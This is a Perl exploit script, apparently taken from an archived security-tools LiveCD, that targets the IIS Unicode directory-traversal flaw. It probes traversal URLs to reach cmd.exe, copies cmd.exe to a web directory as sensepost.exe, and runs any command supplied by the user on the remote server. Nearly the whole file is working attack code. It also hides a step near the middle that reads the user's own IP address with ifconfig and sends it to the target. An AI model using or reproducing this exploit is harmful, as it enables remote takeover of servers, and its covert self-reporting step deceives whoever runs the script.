home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / unicodexecute3.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  3.9 KB  |  111 lines
  1. #!/usr/bin/perl
  2. ######################## 
  3. # Unicodexecute version3
  4. # includes searches for alternative executable dirs
  5. # please look at the code - you might be surprised what else I added
  6. # checks for access denied added
  7. # thnx to MH for testing etc.
  9. # Usage is same as previous version:
  10. # unicodexecute3.pl target:port 'command'
  11. #
  12. # kids - please look at the code before you use it...:-]
  13. # more info at http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
  14. #
  15. # 2001/01/24 Roelof Temmingh 
  16. # roelof@sensepost.com
  17. # http://www.sensepost.com
  18. ##########################
  19.  
  20. use Socket;
  21. my $runi; my $thedir; $|=1;
  22. # --------------init
  23. if ($#ARGV<1) {die "Usage: unicodexecute3 IP:port command\n";}
  24. my ($host,$port)=split(/:/,@ARGV[0]);
  25. my $target = inet_aton($host);
  26. my $thecommand=@ARGV[1];
  27. # -------------find the correct directory
  28. my @unis=(
  29. "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  30. "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c",
  31. "/scripts/..%c0%af../winnt/system32/cmd.exe?/c",
  32. "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  33. "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  34. "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  35. "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  36. "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c");
  37. my $uni;my $execdir; my $dummy; my $line;
  38. foreach $uni (@unis){
  39.  print "testing directory $uni\n";
  40.  my @results=sendraw("GET $uni+dir HTTP/1.0\r\n\r\n");
  41.  foreach $line (@results){
  42.   if ($line =~ /Directory/) {
  43.   ($dummy,$execdir)=split(/Directory of /,$line);   
  44.    $execdir =~ s/\r//g;
  45.    $execdir =~ s/\n//g;
  46.    if ($execdir =~ / /) {$thedir="%22".$execdir; $thedir=~ s/ /%20/g;}
  47.     else {$thedir=$execdir;}
  48.    print "farmer brown directory: $thedir\n";
  49.    $runi=$uni; goto further;}
  50.  }
  51. }
  52. die "nope...sorry..not vulnerable\n";
  53.  
  54. further:
  55. # --------------test if cmd has been copied:
  56. my $a=`which ifconfig`; chomp $a; 
  57. my $aa=`$a -au | grep -i mask | grep -v 127.0.0.1 | head -n 1`; $aa=~s/ //g;
  58. sendraw("GET /naughty_real_$aa\r\n\r\n");
  59. my $failed=1;
  60. my @unidirs=split(/\//,$runi);
  61. my $unidir=@unidirs[1];
  62. my $command="dir $thedir%22";
  63. $command=~s/ /+/g;
  64. my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  65. my $line;
  66. foreach $line (@results){
  67.  if ($line =~ /denied/) {die "can't access above directory - try switching dirs order around\n";}
  68.  if ($line =~ /sensepost.exe/) {print "sensepost.exe found on system\n"; $failed=0;}
  69. }
  70. #--------------we should copy it
  71. my $failed2=1;
  72. if ($failed==1) { 
  73.  print "sensepost.exe not found - lets copy it\n";
  74.  $command="copy c:\\winnt\\system32\\cmd.exe $thedir\\sensepost.exe%22";
  75.  $command=~s/ /+/g;
  76.  my @results2=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  77.  my $line2;
  78.  foreach $line2 (@results2){
  79.   if (($line2 =~ /copied/ )) {$failed2=0;}
  80.   if (($line2 =~ /access/ )) {die "access denied to copy here - try switching dirs order around\n";}
  81.  }
  82.  if ($failed2==1) {die "copy of CMD.EXE failed - inspect manually:\n@results2\n\n"};
  84. # ------------ we can assume that the cmd.exe is copied from here..
  85. my $path;
  86. ($dummy,$path)=split(/:/,$thedir);
  87. $path =~ s/\\/\//g;
  88. $runi="/".$unidir."/sensepost.exe?/c";
  89. $thecommand=~s/ /%20/g;
  90. @results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");
  91. foreach $line (@results){
  92.  if ($line =~ /denied/) {die "sorry, access denied to write the upload page\n";}
  93. }
  94. print @results;
  95.  
  96. #-------------slightly modified RFP sendraw 
  97. sub sendraw {
  98.  my ($pstr)=@_;
  99.  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  100.  if(connect(S,pack "SnA4x8",2,$port,$target)){
  101.   my @in="";
  102.   select(S); $|=1; print $pstr;
  103.   while(<S>) {
  104.    push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
  105.   select(STDOUT); return @in;
  106.  } else { die("connect problems\n"); }
  107. }
  108. # Spidermark: sensepostdata unicode3
  109.  
  110.  
  111.